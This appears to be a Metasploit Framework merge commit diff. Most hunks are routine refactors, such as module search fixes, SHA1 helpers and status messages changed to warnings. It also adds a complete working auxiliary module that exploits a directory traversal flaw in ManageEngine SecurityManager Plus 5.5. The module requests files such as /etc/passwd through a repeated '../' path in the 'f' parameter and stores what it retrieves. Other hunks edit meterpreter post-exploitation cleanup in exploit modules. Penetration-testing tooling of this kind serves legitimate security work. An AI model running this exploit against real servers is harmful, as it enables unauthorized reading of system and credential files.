Merge branch 'upstream-master' into WinRM_piecemeal

Author: David Maloney

lib/msf/core/db_manager.rb

@@ -588,8 +588,8 @@ def search_modules(search_string, inclusive=false)
 					where_v << [ xv, xv ]
 				when 'os','platform'
 					xv = "%#{kv}%"
-					where_q << ' ( module_targets.name ILIKE ? ) '
-					where_v << [ xv ]
+					where_q << ' (  module_platforms.name ILIKE ? OR module_targets.name ILIKE ? ) '
+					where_v << [ xv, xv ]
 				when 'port'
 					# TODO
 				when 'type'

lib/rex/text.rb

@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'digest/md5'
+require 'digest/sha1'
 require 'stringio'
 
 begin
@@ -812,6 +813,20 @@ def self.md5(str)
 		Digest::MD5.hexdigest(str)
 	end
 
+	#
+	# Raw SHA1 digest of the supplied string
+	#
+	def self.sha1_raw(str)
+		Digest::SHA1.digest(str)
+	end
+
+	#
+	# Hexidecimal SHA1 digest of the supplied string
+	#
+	def self.sha1(str)
+		Digest::SHA1.hexdigest(str)
+	end
+
 	#
 	# Convert hex-encoded characters to literals.
 	# Example: "AA\\x42CC" becomes "AABCC"

modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb

@@ -135,8 +135,8 @@ def run
 		sunrpc_destroy
 
 	rescue ::Rex::Proto::SunRPC::RPCTimeout
-		print_status 'Warning: ' + $!
-		print_status 'Exploit may or may not have succeeded.'
+		print_warning 'Warning: ' + $!
+		print_warning 'Exploit may or may not have succeeded.'
 	end
 
 

modules/auxiliary/scanner/http/manageengine_traversal.rb renamed to modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb

@@ -0,0 +1,92 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal',
+			'Description'    => %q{
+					This module exploits a directory traversal flaw found in ManageEngine
+				SecurityManager Plus 5.5 or less.  When handling a file download request,
+				the DownloadServlet class fails to properly check the 'f' parameter, which
+				can be abused to read any file outside the virtual directory.
+			},
+			'References'     =>
+				[
+					['OSVDB', '86563'],
+					['EDB', '22092']
+				],
+			'Author'         =>
+				[
+					'blkhtc0rp',  #Original
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'DisclosureDate' => "Oct 19 2012"
+		))
+
+		register_options(
+			[
+				OptPort.new('RPORT',       [true, 'The target port', 6262]),
+				OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+				OptString.new('FILE',      [true, 'The file to obtain', '/etc/passwd']),
+				OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+			], self.class)
+	end
+
+
+	def run_host(ip)
+		base = target_uri.path
+		base << '/' if base[-1,1] != '/'
+
+		peer = "#{ip}:#{rport}"
+		fname = datastore['FILE']
+
+		print_status("#{peer} - Reading '#{datastore['FILE']}'")
+		traverse = "../" * datastore['DEPTH']
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => "#{base}store",
+			'vars_get' => {
+				'f' => "#{traverse}#{datastore['FILE']}"
+			}
+		})
+
+
+		if res and res.code == 500 and res.body =~ /Error report/
+			print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:")
+			print_error("\t1. File does not exist.")
+			print_error("\t2. The server does not have any patches deployed.")
+			print_error("\t3. Your 'DEPTH' option isn't deep enough.")
+			print_error("\t4. Some kind of permission issues.")
+
+		elsif res and res.code == 200
+			data = res.body
+			p = store_loot(
+				'manageengine.securitymanager',
+				'application/octet-stream',
+				ip,
+				data,
+				fname
+			)
+
+			vprint_line(data)
+			print_good("#{peer} - #{fname} stored as '#{p}'")
+
+		else
+			print_error("#{peer} - Fail to obtain file for some unknown reason")
+		end
+	end
+
+end

modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb

@@ -101,6 +101,8 @@ def run_host(ip)
 
 				conf[:os_sp]   = res['sp']   if res['sp']
 				conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/
+				conf[:SMBName] = simple.client.default_name if simple.client.default_name
+				conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain
 
 				report_note(
 					:host  => ip,

modules/auxiliary/scanner/smb/smb_version.rb

@@ -144,7 +144,7 @@ def cmd_check(*args)
 		end
 
 		if(reps < 30)
-			print_status("WARNING: This server did not reply to all of our requests")
+			print_warning("WARNING: This server did not reply to all of our requests")
 		end
 
 		if(random)

modules/auxiliary/spoof/dns/bailiwicked_domain.rb

@@ -134,7 +134,7 @@ def cmd_check(*args)
 		end
 
 		if(reps < 30)
-			print_status("WARNING: This server did not reply to all of our requests")
+			print_warning("WARNING: This server did not reply to all of our requests")
 		end
 
 		if(random)

modules/auxiliary/spoof/dns/bailiwicked_host.rb

@@ -70,6 +70,7 @@ def check
 	end
 
 	def on_new_session(client)
+		print_warning("Deleting temp.php")
 		if client.type == "meterpreter"
 			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
 			client.fs.file.rm("temp.php")

modules/exploits/linux/http/symantec_web_gateway_file_upload.rb

@@ -109,7 +109,7 @@ def on_new_session(client)
 		res = client.fs.file.search(nil, "currencies.php", true, -1)
 		res.each do |hit|
 			filename = "#{hit['path']}/#{hit['name']}"
-			print_status("#{peer} - Restoring #{filename}")
+			print_warning("#{peer} - Restoring #{filename}")
 			client.fs.file.rm(filename)
 			fd = client.fs.file.new(filename, "wb")
 			fd.write(currencies_php)